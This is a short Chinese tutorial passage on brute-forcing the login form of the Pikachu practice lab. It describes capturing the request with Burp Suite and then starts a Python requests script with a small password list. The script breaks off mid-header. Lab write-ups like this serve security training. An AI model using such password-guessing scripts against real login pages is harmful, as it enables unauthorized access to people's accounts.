在对pikachu靶场的暴力破解进行测试时,我们可以使用burpsuite进行爆破,也可使用Python脚本进行自动化爆破
以下内容主要记录本次使用Python进行暴力破解的思路:
- 通过burpsuite进行截断,获取客户提交的http请求信息:
- 通过burpsuite截断信息,我们可以获取cookie及post提交的字段信息;
- 根据获取到的信息编写Python脚本:
import requests
from bs4 import BeautifulSoup
s = requests.session()
password = ['123', '456', '123456', '67899']
# 设置http请求头部信息
header = {
'User-Agent': '